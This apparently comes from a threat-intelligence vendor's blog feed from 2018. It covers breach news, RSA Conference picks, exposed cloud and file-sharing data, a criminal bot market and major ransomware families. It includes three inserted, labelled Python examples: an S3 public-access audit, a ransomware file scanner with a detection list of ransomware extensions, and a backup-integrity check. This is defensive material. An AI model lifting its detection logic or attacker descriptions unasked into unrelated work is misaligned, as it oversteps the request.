One beta test meeting with a worldwide manufacturer particularly stands out for me: “You’ve incorporated all my requirements and suggestions; this is awesome. It will save me time and help me focus on priority research and threat investigations.”

In Summary

I think Shadow Search is a truly valuable addition to our SearchLight service and will help our clients to use our wealth of knowledge to investigate threats and make decisions faster, giving back valuable time to the security operations function. Learn more about Shadow Search by downloading our datasheet or requesting a demo. It will be available to all customers in Q2.

Shadow Search for Digital Shadows SearchLight™
Stay up to date with our latest news and threat intelligence. Subscribe to our threat intelligence emails here.

Shadow Talk Update – 04.09.2018
Mon, 09 Apr 2018 20:52:07 +0000

Back from the Easter break, this week’s Shadow Talk discusses the re-emergence of WannaCry, the exposure of Aggregate IQ data, the exposure of 1.5 billion files through misconfigured services, lessons learned from the Panera breach, an emerging new criminal market, and much more.

Oil pipeline company disrupted by unidentified cyber attack

Certain parts of the electronic data interchange (EDI) communication system used by a US oil and gas pipeline company were rendered temporarily unavailable by an unspecified online attack. At the time of writing, the attackers’ tactics, techniques and procedures (TTPs) remain undetermined. The victim company, Energy Transfer Partners LP, stated that the flow of natural gas remained unaffected throughout the incident, and that no information was stolen or compromised. Oil and gas companies, including those affiliated with national infrastructure, continue to be prime targets for financially motivated and espionage-seeking threat actors.

Malaysian central bank thwarts SWIFT attack

Bank Negara Malaysia claimed to have prevented a theft of funds via the Society for Worldwide Interbank Financial Telecommunication (SWIFT) system. The attackers had tried to make fraudulent wire transfer requests through the SWIFT platform. Bank Negara Malaysia stated that no funds were stolen, and that the payment and settlement systems were not affected or disrupted. In the past six months, several financial entities in Russia and South-East Asia have been targeted by attackers attempting to steal funds via SWIFT. The continued targeting of financial institutions and their geographic concentration indicate that a single threat group may be responsible. Given that these attacks target banks’ internal security systems rather than the central SWIFT system, the perpetrators may perceive these locations as having weaker internal security standards.

Boeing production plant infected by WannaCry

The “WCry” (aka WannaCry) malware reportedly infected a small number of computers at a Boeing production plant, triggering concerns that airframe testing equipment and software may have been compromised. Boeing later stated that no disruption had been caused to its production programs. It remains unknown whether this version of WCry was the same used in the widespread campaign of May 2017, and therefore whether the same threat actor is responsible. Alternatively, this version may have been spoofed and exploited by different threat actors to encourage swift payment of the ransom through WCry’s notoriety.

Luxury retailers hit by credit card breach

Credit card details held by luxury retailers Saks Fifth Avenue and Lord & Taylor were breached, and a portion of the data was advertised for sale on dark web marketplace Joker’s Stash on 28 Mar 2018. Security research company Gemini attributed the breach to financially motivated threat actor “FIN7”; however, evidence for this attribution remains unclear. The retailers’ parent entity, Hudson’s Bay Company, did not specify how many customers were affected, but more information may be released in the near future (next three months).

Millions of Panera customers’ personal details allegedly compromised

On 02 Apr 2018 security researchers reported that a flaw on PaneraBread[.]com, the main website of United States bakery-café-restaurant chain Panera, had potentially left over seven million customer records exposed since Aug 2017. Threat actors could use the data for identity theft and fraud, although Digital Shadows’ research has uncovered no evidence that the records have been used maliciously. The flaw appears to have been fixed on 02 Apr 2018, but prior to that the information could have been downloaded by threat actors and it may remain available.

ChessMaster observed exploiting CVE-2017-11882

Espionage campaign ChessMaster has shown updated TTPs in its ongoing targeting of a variety of industries in Japan, using an exploit for CVE-2017-11882, a vulnerability in Microsoft Office’s Equation Editor. Exploitation of this vulnerability has been observed several times over the past five months in campaigns by various threat actors. Enterprises using Microsoft Office 2007 to 2016 should apply the relevant security updates from Microsoft.

One CISO’s Recommendations for Making the Most of RSA Conference Sessions Mon, 09 Apr 2018 15:19:15 +0000 Last week, Enterprise Strategy Group (ESG) principal analyst, Jon Oltsik, wrote an article for CSO titled: “RSA Conference: CISOs’ top 4 cybersecurity priorities.” Jon highlighted four areas that security executives will be looking for at next week’s RSA Conference:

  1. Executive-level threat intelligence (Jon highlighted Digital Shadows in this category)
  2. Integrated security platforms
  3. Business risk
  4. Changing security perimeters

In the past, I’ve written my own RSA Conference (RSAC) preview blogs and Jon’s article reminded me that I should do it again. A few things to note before I get started:

  • This blog is going to be focused on conference talks that will resonate with most CISOs.
  • I know there will be many other activities going on next week and you have limited time; let me help you maximize the time you have allotted for talks.
  • You should absolutely take advantage of “hallwaycon” and all the networking opportunities associated with the RSAC week. This will get you the best return on your investment.
  • You could just go to the RSAC “Sessions & Events” page and search by the “Core Topic” of “C-Suite View” or “Security Strategy,” but your time is precious. So, to save you some, I spent the morning going through the RSAC agenda, so you don’t have to.
  • I focused on the following areas: (1) investment, metrics, and communication, (2) GDPR, (3) recruiting and retaining staff, (4) third party risk, (5) cloud native security, and (6) national security.


Here are my recommendations for the RSAC talks you should check out:

  • The Innovation Sandbox. This isn’t a talk, but something I highly recommend nevertheless. I’m a big fan of the Innovation Sandbox, and while I was at Forrester Research I moderated several panels at the event. I admit I could be a bit biased towards it. The Innovation Sandbox is a great way to track startups that could help you solve some of the challenges that CISOs face. It is also fun to watch the pitches, and you can also pick up techniques to improve your own presentation style/public speaking. This can be very useful, particularly as you think about it applying to your own board presentations.
  • Investment, metrics, and communication. This year, there is no shortage of CISO focused talks. I suggest the following as the topics really resonate with me and there are also real work examples from practitioners in the mix. These talks also align with Jon Oltsik’s business risk area from his CSO article.
    • Stop Translating, Start Defending: Common Language for Managing Cyber-Risk TECH-W04
    • Building and Selling Your Security Strategy to the Business STR-W14
    • Creating Order from Chaos: Metrics That Matter GRC-W04
    • Implementing a Quantitative Cyber-Risk Framework: A FinSrv Case Study STR-W02
    • Security Programs. ROI not CYA EXP-R14
    • Charting a Clear Course: Prioritizing Security Investments and Activities STR-T07
    • 10 Tenets of CISO Success STR-W04
    • Inside Cyber-Balance Sheets: A Rare Window on Digital Risk in the Boardroom CXO-R14
  • GDPR. Worried about GDPR? You will be. If you deal with European Union citizen data, this year’s RSAC has you covered, and it’s important since GDPR enforcement is now “next month.” I’m almost as excited for GDPR as I am for the Deadpool sequel featuring Thanos, and the new Han Solo movie (please, please save it Donald Glover). While I work on my Privacy Impact Assessments, consider these talks:
    • How to Tackle the GDPR: A Typical Privacy and Security Roadmap PRV-T10
    • The GDPR Is Only for Europe—Right? GRC-R02
    • GDPR Compliance—You Forgot Your Digital Environment GRC-R12
  • Recruiting and retaining staff. I think the “cyber security talent shortage” is a self-fulfilling prophecy. Don’t be a statistic, and don’t succumb to the hype! I think these talks can help you:
    • A NICE Way to Find and Keep Cybersecurity Workers PROF-W04
    • The Cybersecurity Job Seekers Report: Results and Implications AST1-W02
    • The Life and Times of Cybersecurity Professionals AST3-R02
  • Third party risk. I’m always looking for ways to get better at managing third party risk and if you read the headlines, nearly everyone else should be looking as well. I would’ve liked to have seen more talks on this topic. I included some Peer2Peer talks in here as well:
    • Personality Profiling Your Third Parties for Effective Supplier Management STR-T08
    • The Supply Chain Threat GRC-T10
    • Effectively Managing a Third-Party Technology Risk Program P2P4-R05
    • Third-Party Risk Assessment Tilt-A-Whirl. Stop the Ride, I Want to Get Off! P2P3-W04
  • Cloud security. Cloud security is a key component of our security program and the same is likely true for you. I really like the contrast of the following two talks. In the first, you have one of, if not the, top industry analysts who cover cloud security, Rich Mogull (of Securosis fame). In the second, you have the founder and former CEO of Tim Prendergast, who is now the Chief Cloud Officer at Palo Alto Networks. was recently acquired for a cool $300 million.
    • Building and Adopting a Cloud-Native Security Program CSV-W14
    • Is Cloud-Native Security Enough? SPO3-W14
  • National Security. I’m a self-professed national security geek and I think all CISOs need to track geopolitical and national security issues. Check out these talks:
    • Cyberwar Game: Behind Closed Doors with the National Security Council EXP-T07 (I’ll pretty much watch anything Jason Healey is involved in)
    • DARPA R&D Enabling US Cyber-Deterrence PNG-F03R (DARPA is cool, and they are doing this talk twice!)
    • Former NSA and Israeli Intelligence Directors on Resilience EXP-F01 (Despite getting 8200’d/NSA’d to death at Forrester, I still want to see this talk).

Am I missing any talks that resonate with you? Please share.

I know that many people (cue the Infosec Twitterverse) bash big security events like RSAC; my suggestion is to ignore that and make the most of the event. Next week is a great opportunity to gain knowledge that you can bring back to your team and an excellent opportunity to build your professional network.

Next week is also a great time to unwind and step away from the chaos that is being an information security professional. Digital Shadows is sponsoring the “Security Leaders” party on Tuesday night April 17th at City View @ Metreon. Come join us and have a good time with your peers and make some new friends. You can register here.

RSA Party Digital Shadows

When Sharing Is Not Caring: Over 1.5 Billion Files Exposed Through Misconfigured Services Thu, 05 Apr 2018 12:23:14 +0000 Our recent report, “Too Much Information”, discovered over 1.5 billion files exposed through a host of services, including Amazon S3 buckets, rsync, SMB, FTP, NAS drives, and misconfigured websites.


We love data, and we need ways to store, share and transfer this data to other individuals and parties. There are a range of services that are used to do this, and one way that has gained popularity over the last few years is cloud storage, specifically Amazon Simple Storage Service (S3) buckets. Unfortunately, many administrators misconfigure these S3 buckets, rendering the contents publicly accessible. Barely a month goes by without another open S3 bucket being discovered – who remembers the data of 198 million voters being exposed last year?

However, S3 buckets are not alone. In our research we found that they only constituted seven percent (7%) of the exposed files we found. Many other services that are used to store, share, or transfer data are also frequently misconfigured:

  • File Transfer Protocol (A network protocol used to transfer computer files);
  • rsync (A way of transferring and synchronizing files);
  • Server Message Block (A network file sharing protocol);
  • Network-attached storage devices (Devices often used to backup home computers).

Combined, these services expose over 1.5 billion files, with SMB, rsync and FTP accounting for 33, 28, and 26 percent respectively.
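The S3 exposures described above come down to two documents an administrator controls: the bucket policy and the bucket ACL. The following is an added example, not code from Digital Shadows or the report, showing an offline audit of both documents in the JSON shape that `aws s3api get-bucket-policy` and `aws s3api get-bucket-acl` return; it flags any Allow statement whose Principal is everyone and any ACL grant to the AllUsers or AuthenticatedUsers groups. The bucket name, account ID and owner ID in the sample documents are constructed placeholders.

```python
"""Offline audit of an S3 bucket policy and ACL for public-access grants.

Added example (not Digital Shadows' code). Input is the JSON that
`aws s3api get-bucket-policy` / `aws s3api get-bucket-acl` return; output is
a list of human-readable findings, one per public grant.
"""
import json

# The two predefined group URIs that mean "anyone" in an S3 ACL.
PUBLIC_GROUP_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers (anonymous)",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers (any AWS account)",
}


def _as_list(value):
    """Policy fields such as Action/Statement may be a scalar or a list."""
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal) -> bool:
    """True if a statement's Principal matches every caller ("*" or {"AWS": "*"})."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def find_public_policy_statements(policy: dict) -> list:
    """Describe every Allow statement that grants access to any principal.

    A statement with a Condition block is still reported (conditions such as
    aws:SourceIp may or may not narrow it usefully) but labelled 'conditional'
    so a reviewer knows to read it.
    """
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _principal_is_public(stmt.get("Principal")):
            continue
        actions = ", ".join(_as_list(stmt.get("Action", [])))
        kind = "conditional" if stmt.get("Condition") else "unconditional"
        findings.append(f"{stmt.get('Sid', '<no Sid>')}: {kind} public grant of {actions}")
    return findings


def find_public_acl_grants(acl: dict) -> list:
    """Describe every ACL grant made to one of the public groups."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUP_URIS:
            findings.append(f"{PUBLIC_GROUP_URIS[grantee['URI']]}: {grant.get('Permission')}")
    return findings


# Constructed sample policy: one world-readable statement (the misconfiguration)
# and one account-scoped statement that must NOT be flagged.
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "TeamWrite", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/uploader"},
     "Action": ["s3:PutObject"], "Resource": "arn:aws:s3:::example-bucket/*"}
  ]
}""")

# Constructed sample ACL: owner has full control, plus an anonymous READ grant.
SAMPLE_ACL = {
    "Owner": {"ID": "constructed-owner-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "constructed-owner-id"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}

if __name__ == "__main__":
    for finding in find_public_policy_statements(SAMPLE_POLICY) + find_public_acl_grants(SAMPLE_ACL):
        print("PUBLIC:", finding)
```

Run against every bucket in an account, an empty result from both functions is the state you want; anything else is a bucket whose contents can be listed or read without credentials.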


What’s the damage?

The amount of exposed data is staggering. Over twelve petabytes of data is exposed (12,000 terabytes). For context, this is over four thousand times larger than the “Panama Papers” leak (2.6 terabytes). It’s also 12 thousand times larger than the Deep Root exposure of 198 million voters in 2017. Almost all countries are affected, but the United States experienced the most exposure with 239,607,590 files.


Figure 1: Geographical distribution of exposed data


Types of Exposed Data

It’s not just the volume but the sensitivity of the data that is a major cause for concern. There were a number of instances of high severity exposure of personal information, intellectual property, and security assessments.

There is an incredible amount of personal data exposed, including payroll, tax return and healthcare information. If we consider how much is exposed (the news that the data of 87 million Facebook users may have been harvested is a good example), this adds significantly to this already rich trove of data, providing more and more information that could be used for malicious purposes such as social engineering and fraud. Furthermore, with GDPR fast-approaching, there are clear regulatory concerns for organizations surrounding the protection of personal data, particularly if employees and contractors are copying and archiving work files using cloud storage and NAS solutions.


Figure 2: Types of publicly-available personal information


Our report also highlights numerous cases of intellectual property that is also exposed through these services. In one instance, a technology company providing Electronic Medical Records software had their copyright application and full source code publicly-available. In another instance, an energy company had sensitive details and diagrams of their patent-pending technology exposed. Loss of intellectual property can also have considerable financial and reputational impacts.


Figure 3: Types of publicly-available intellectual property


Finally, there were a worrying number of security assessments made available. This includes thousands of penetration tests, network diagrams, and security audits. We found a series of security documents belonging to a leading European supplier of electronic identification services used within the banking industry. These files contained in-depth security assessments, source code testing results, and vulnerability scanning reports that revealed details on insecure servers. These infrastructure reports exposed server locations and hosting IPs, missing software patches, port information, CVE numbers, and vulnerability descriptions that may allow an attacker to modify data, inject malicious code, or perform man-in-the-middle attacks. This type of information is a goldmine for attackers targeting organizations, and an attacker will typically spend weeks, if not a couple of months performing reconnaissance on their targets to glean this exact type of information.


Figure 4: Types of publicly-available security assessments


Download a copy of our report to learn more about the types of sensitive data these services are exposing, and how you can help to reduce this problem.


Want more Digital Shadows research? Subscribe to our threat intelligence emails here.

Genesis Botnet: The Market Claiming to Sell Bots That Bypass Fingerprinting Controls Tue, 03 Apr 2018 15:18:06 +0000 An emerging criminal market, Genesis store, provides more effective ways to impersonate a victim’s browser activity, focusing on individual bots rather than huge botnets, and monetizing them in a completely different way. Such an approach may allow criminals to utilize bots with higher efficiency, thus revealing new attack and fraud methods.


Figure 1: Adverts for the Genesis Store on a carding forum

Evolution of fingerprinting controls

Device fingerprinting collects information about a computer in order to identify an individual user. This is a pretty handy technique for retailers and banks who want to prevent fraud. Typically, anti-fraud solutions take known fraudulent activity and seek to block transactions that have a similar device fingerprint. This has become a cat-and-mouse affair, as criminals look to randomize their fingerprint with the help of various online services (many of which were covered in our report, Inside Online Carding Courses Designed for Cybercriminals). In response, anti-fraud technologies take into account a broader set of characteristics.

Criminals, therefore, look to the machines of their victims in order to evade detection. However, obtaining this array of information is challenging. That’s where Genesis comes in. Genesis Store seeks to provide a single solution to emulate this approach, providing access to victims’ device footprints, accounts, and personal information. The store – registered in November 2017 and still in beta mode – claims to be the result of research conducted across the anti-fraud technologies used by 283 major banks and payment systems.


Access to a wide range of data

In order to emulate the legitimate users, Genesis provides customers with a wide range of information such as fingerprints, cookies, logs, saved passwords, and personal information.

This information is acquired from web injects, form grabbers and passwords saved in browsers. As these sources get more detailed or updated data, that data is automatically pushed into the store and made available to users. While this means that not all information is verified, it provides a more scalable business model for the administrators.


Figure 2: A screenshot of the Genesis Store


Browser plugin

For less than fifty dollars, users can buy a bot on the Genesis site, which includes the fingerprint, accounts, and cookies (unsurprisingly, the store does not use or sell any products connected with the Russian Commonwealth). For free you also get the Genesis Application, a browser plugin.

The plug-in claims to work with any operating system on Chrome-like browsers (Chrome, Iron, Iridium and others) and provides a seamless way to access the user fingerprint. The plug-in automatically updates and offers additional information on cookies and login data, as well as holder details, security answers, and card details.


Figure 3: The Genesis Security plugin


Innovative monetization techniques

Instead of focusing on selling large quantities of bots in bulk, Genesis focuses on the individual quality of each bot. The actors behind the botnet also have a very clear idea of how to monetize this. For example, their configurations must be used with their own plugin, and will not work without doing so. This is a similar business model to buying games for a Nintendo – you need to buy their own cartridges.


What to look out for

The site makes big claims about its capabilities and it will live and die by how it matches up to these promises. As with all new marketplaces, its success will also depend on user adoption, quality of goods, site security and user experience. Nevertheless, Genesis is still in beta mode yet appears to have picked up a good amount of interest since it was registered in November 2017. There are over 1500 bots available to buy and, at the time of analysis, eight bots had been purchased in the last 20 minutes.

As the site develops and grows out of beta mode, and if the claimed capabilities are realised, the shift to using more individual bots could have an impact on organizations’ ability to combat fraud.

To keep up with our latest in threat intelligence, subscribe here.

RSA Conference 2018 – Digital Shadows Wed, 28 Mar 2018 05:04:16 +0000 RSA Conference is almost here! This year’s conference theme is “Now Matters,” looking at the quick impact threats can have to enterprises globally if we don’t find them today.

Today we see the perfect storm for digital risk and cyber threats. There are more exposure points, more sophisticated attacks, more things to protect, and increased regulations. Security leaders are faced with new challenges every day including:

  • Constant attacks from cyber criminals
  • Employees and third parties exposing sensitive data
  • Limited resources & security talent
  • Ineffective threat intelligence tools
  • Not knowing which digital risks to prioritize
  • Limited access to data sources and language
  • Disparate point solutions
  • Expanding attack surface

I started Digital Shadows to help organizations quickly identify when they are at risk without needing to deploy tons of threat intelligence resources to scan the open, deep, and dark web for threats to their business.

At RSA Conference 2018, our security specialists will be available to walk through how we help our clients quickly identify risks such as data loss, brand impersonation, cyber threats, credential exposure, and more. If you’re interested in a quick chat, book time with us here or visit us at Booth 5107 in the North Hall.

I’m looking forward to the awesome line up of events and activities at this year’s conference and I hope to see you at our party Tuesday night at City View @ Metreon. Cheers!

RSA Party Digital Shadows

The Five Families: The Most Wanted Ransomware Groups Tue, 27 Mar 2018 15:25:30 +0000 Last week we presented a webinar on “Emerging Ransomware Threats and How to Protect Your Data”. Here we discussed the latest ransomware threats and trends, as well as strategies organizations can take to strengthen their defenses and stay compliant.

The ransomware ecosystem has evolved continuously over recent years. There are new operational models such as ransomware-as-a-service (RaaS), and cybercriminals are leveraging remote entry vectors like remote desktop protocol (RDP) and JBoss application servers. Ransomware operators are also experimenting with self-propagation techniques to increase the impact of their attacks.

With so many different variants in circulation, it can be hard to make sense of what the most critical ransomware threats are to your organization. Although we shouldn’t discount lesser known or less-popular variants, there are five main ransomware families that are prominent currently.


Locky

Locky has been active since early 2016 and has predominantly been delivered using spam emails, although the Nuclear and RIG exploit kits have also been used. This ransomware has been consistently updated, particularly with changes to the way encrypted files are appended, leading media reports to attribute different naming conventions to Locky versions, such as Zepto (named after the .zepto extension). Locky activity increased in December 2017 with the resumption of spam activity by the Necurs botnet, which delivered up to 47 million spam emails per day over the holiday period.


Cerber

Cerber has been frequently developed and distributed since its inception in February 2016, with at least six different versions of the malware developed. Significantly, Cerber is run using a RaaS model, making it a highly automated operation both for actors using the platform and for servicing ransom payments and distributing decryptors to victims. The ransomware typically uses spam email and drive-by-downloads for delivery and has been associated with the RIG and Magnitude exploit kits. Cerber encrypts victim files with a random four-letter extension. Cerber RaaS customers can alter the specific ransom demands, although average prices for unlocking files fall between $1000 and $2000.



Figure 1: Cerber decryption service homepage


DMA Locker

First detected in January 2016, DMA Locker differs from traditional ransomware variants as it does not add a file extension to encrypted files, but instead adds an identifier to the file header. DMA Locker has been delivered through RDP as well as spam emails and the RIG exploit kit. Following a successful infection, the ransomware begins encrypting files if an Internet connection is available. However, if an internet connection is not available, the ransomware installs itself and waits for a connection to be established before encrypting files.


Crysis

Crysis is distributed via spam emails and compromised RDP services. Several variants of the ransomware exist to date. The first had its decryption keys publicly released, enabling decryption without payment; however, recent variants that encrypt files with .arena, .cobra and .dharma extensions do not currently have publicly available decryption keys. Crysis also has additional capabilities such as harvesting information from the victim machine to send remotely to a command and control server. This includes collecting credentials, instant messaging application data, webcam, and browser information.


SamSam

Active since at least December 2015, SamSam has been used in targeted attacks against high-profile victims and large organizations in the United States, Europe and Asia. These include transport organizations, such as transit authorities, as well as the healthcare and education sectors. Unlike most variants that use phishing emails and exploit kits, SamSam exploits Internet-facing JBoss application servers, then harvests administrator credentials before self-propagating and infecting all the endpoints within a network. Each infected machine is held to ransom, with demands ranging from approximately $4,000 for one machine to $33,000 for all machines within a network. SamSam is believed to be operated by a group known as Gold Lowell.



Figure 2: Overview of the top five ransomware families
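Two of the observable traces the families above leave on disk are the appended extensions (.zepto from Locky, .arena/.cobra/.dharma from Crysis) and, for a variant that encrypts in place without renaming (as DMA Locker does), a file whose extension promises text but whose bytes are near-random. The following is an added example, not code from Digital Shadows or the webinar, of a file-system sweep that uses both signals: a known-extension match, and a Shannon-entropy check restricted to extensions that should never be near 8 bits per byte when intact. The sample directory it builds is constructed for illustration (random bytes stand in for encrypted content); the entropy threshold and the list of low-entropy extensions are assumptions a defender would tune to their own estate.

```python
"""Sweep a directory tree for files that look like ransomware output.

Added example (not Digital Shadows' code). Signals:
  1. file extension in the set the families above are documented to append;
  2. high byte entropy in a file whose extension implies plain text, which is
     what in-place encryption that keeps the file name leaves behind.
Compressed or encrypted-by-design formats (zip, docx, pdf with streams) are
legitimately high-entropy, so the entropy rule is limited to text formats.
"""
import math
import os
import tempfile
from collections import Counter
from typing import Dict, Optional

# Extensions named on this page as appended by Locky (Zepto) and Crysis variants.
KNOWN_RANSOM_EXTENSIONS = {".zepto", ".arena", ".cobra", ".dharma"}
# Assumption: formats whose intact contents are far from random.
LOW_ENTROPY_EXTENSIONS = {".txt", ".csv", ".log", ".xml", ".json", ".html"}
ENTROPY_THRESHOLD = 7.5   # bits/byte; assumption: encrypted data sits close to 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte over the given buffer (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_file(path: str, sample_size: int = 65536) -> Optional[str]:
    """Return a reason string if the file is suspicious, else None."""
    ext = os.path.splitext(path)[1].lower()
    if ext in KNOWN_RANSOM_EXTENSIONS:
        return f"known ransomware extension {ext}"
    if ext in LOW_ENTROPY_EXTENSIONS:
        with open(path, "rb") as fh:
            entropy = shannon_entropy(fh.read(sample_size))  # head is enough
        if entropy >= ENTROPY_THRESHOLD:
            return f"high entropy ({entropy:.2f} bits/byte) for {ext} file"
    return None


def scan_tree(root: str) -> Dict[str, str]:
    """Map relative path -> reason for every suspicious file under root."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            reason = classify_file(path)
            if reason:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = reason
    return findings


def build_sample_tree() -> str:
    """Constructed sample: a healthy text file, a Locky-style renamed file, and
    a JSON file 'encrypted' in place (simulated here with random bytes)."""
    root = tempfile.mkdtemp(prefix="ransom_scan_")
    with open(os.path.join(root, "notes.txt"), "wb") as fh:
        fh.write(b"quarterly report draft, see attached figures\n" * 200)
    with open(os.path.join(root, "invoice.pdf.zepto"), "wb") as fh:
        fh.write(os.urandom(4096))
    with open(os.path.join(root, "config.json"), "wb") as fh:
        fh.write(os.urandom(4096))
    return root


if __name__ == "__main__":
    for rel_path, reason in sorted(scan_tree(build_sample_tree()).items()):
        print(f"{rel_path}: {reason}")
```

Pointing `scan_tree` at a file share and alerting on any non-empty result is a cheap early-warning for an encryptor that has reached that share; the entropy rule also catches variants whose extension has not yet been catalogued, at the cost of tuning the threshold for formats in your environment.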


Although some ransomware operators have shifted to cryptocurrency mining to make their money, we’d be wrong to assume that ransomware is no longer a threat in 2018. With the above variants still in circulation, and the Colorado Department of Transportation recently experiencing a SamSam ransomware infection on 21 February 2018, it’s clear that the threat from ransomware is a long way away from subsiding.


To that end, there are several measures organizations should employ to ensure they are well-protected in 2018.

  1. Regularly backup data and verify its integrity. Ensure that backups are remote from the main corporate network and machines they are backing up. Use cloud-based and physical backups.
  2. As SamSam has relied on vulnerable, external-facing servers, applying relevant patches and updates is recommended.
  3. A defense in depth strategy can aid mitigation. This includes segmenting networks, firewalling-off SMB traffic, and restricting access to important data to only those who are required to have it.
  4. Develop and practice your ransomware playbook so that all members of the organization (operations, IT, security, legal, PR) know their role should the undesirable occur.
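Step 1 above asks for backups whose integrity is verified, not just taken. The following is an added example, not code from Digital Shadows or the webinar, of the simplest form of that check: a SHA-256 manifest built when the backup is written and compared against the backup set later, reporting files that changed, disappeared, or appeared. The demo builds a constructed backup directory, then simulates an encryptor rewriting one file, deleting another and dropping a new one; the file names are placeholders. The manifest must be stored somewhere the backup host cannot write to, since an operator who can reach the backup can also rewrite a manifest sitting beside it.

```python
"""Build and verify a SHA-256 manifest for a backup set.

Added example (not Digital Shadows' code). build_manifest() runs when the
backup is taken; verify_backup() runs before you rely on the backup and
reports modified, missing and unexpected files relative to the stored manifest.
"""
import hashlib
import json
import os
import tempfile
from typing import Dict, List


def sha256_file(path: str, chunk: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large backups do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map each relative path under root (POSIX separators) to its SHA-256."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(path)
    return manifest


def verify_backup(root: str, manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the backup set on disk with a previously stored manifest."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "missing": sorted(p for p in manifest if p not in current),
        "unexpected": sorted(p for p in current if p not in manifest),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: take a backup, store its manifest, tamper, verify."""
    root = tempfile.mkdtemp(prefix="backup_")
    os.makedirs(os.path.join(root, "db"))
    with open(os.path.join(root, "db", "customers.csv"), "w") as fh:
        fh.write("id,name\n1,alice\n2,bob\n")
    with open(os.path.join(root, "README"), "w") as fh:
        fh.write("constructed backup set\n")

    # Serialise the manifest as it would be written to off-site storage.
    stored_manifest = json.dumps(build_manifest(root), indent=2, sort_keys=True)

    # Simulate an encryptor: one file overwritten, one removed, one new file dropped.
    with open(os.path.join(root, "db", "customers.csv"), "wb") as fh:
        fh.write(b"\x00\xff" * 32)
    os.remove(os.path.join(root, "README"))
    with open(os.path.join(root, "unexpected.txt"), "w") as fh:
        fh.write("not part of the backup\n")

    return verify_backup(root, json.loads(stored_manifest))


if __name__ == "__main__":
    for category, paths in demo().items():
        print(f"{category}: {paths}")
```

A clean result is three empty lists; anything else means the backup cannot be trusted as-is and the restore plan in step 4 should fall back to an older, verified set.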

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.26.2018 Mon, 26 Mar 2018 15:05:01 +0000 This week’s Shadow Talk discusses what the Cambridge Analytica revelations mean for disinformation and personal privacy, updates to the Trickbot, Zeus Panda and Ramnit trojans, the ransomware attack suffered by the City of Atlanta, and the attribution of the Dragonfly campaign to the Russian government.

US pins energy-sector attacks on Russia-backed threat group

The United States government has named the threat group “Dragonfly” (aka Crouching Yeti, Energetic Bear) as responsible for attacks on the US energy sector over the past two years. The attribution was published in a technical alert that also connected Dragonfly to the Russian state. The multi-stage intrusion campaign was highly likely intended to gather intelligence, including credentials and files pertaining to industrial control systems (ICS) and associated systems; there was no indication of sabotage or disruption. The threat group allegedly used trusted third-party suppliers to reach its ultimate targets. The naming of Dragonfly is in line with the United States’ practice of public attribution for attacks, but is unlikely to deter the perpetrators from further attacks. Instead, the attackers will likely adapt their tactics, techniques and procedures (TTPs).

Espionage group culls data from US entities with Asian interests

The suspected Chinese cyber espionage group “TEMP.Periscope” (aka Leviathan) has been cited as responsible for network intrusions of US entities with interests in the South China Sea region. To compromise networks and steal information, the group paired new tools with established tactics and techniques, including spearphishing emails and Microsoft Office exploits. The victims have not been named but, given the geopolitical conflict surrounding the South China Sea, the campaign was highly likely politically motivated and aimed at gathering intelligence. Some of the tools are associated with other suspected Chinese groups, which have also been linked to attacks on entities with interests in the same region. However, there was no indication the groups were actively collaborating, and identification of the groups is unconfirmed because many countries have interests in the South China Sea region. TEMP.Periscope has demonstrated high intent in its campaigns, and more attacks are highly likely.

Mining company extorted by thedarkoverlord

On 16 Mar 2018 breach reporting website DataBreaches[.]net reported that threat actor “thedarkoverlord” (TDO) claimed to have successfully compromised the systems of H-E Parts Morgan, a manufacturer of components for the mining industry. H-E Parts Morgan has not yet publicly commented on the reported breach; information disclosed to DataBreaches[.]net suggests the company refused TDO’s extortion demands. TDO has made no public announcement via social media in reference to this incident. This deviates from the standard modus operandi of the group, which tends to use Twitter to exert pressure on victims to pay an extortion fee.

Adware compromises supply chain, infects millions of Androids

The new adware family “RottenSys” successfully compromised a supply chain process and has infected almost five million Android devices since 2016. The malware masqueraded as a Wi-Fi service application on the devices, and used special permissions to download malicious components via a dropper. To display advertisements on devices, the attackers used a publicly available Android application virtualization framework. The perpetrators have highly likely accrued significant funds from their campaign; an estimated USD 115,000 has been earned since 12 Mar 2018 alone. As well as malvertising, the attackers appeared to be testing a new botnet using RottenSys’ command-and-control (C2) infrastructure. This botnet could be leased to other threat actors to bolster the attackers’ profits.

DDoS attack hits Russian Central Election Commission website

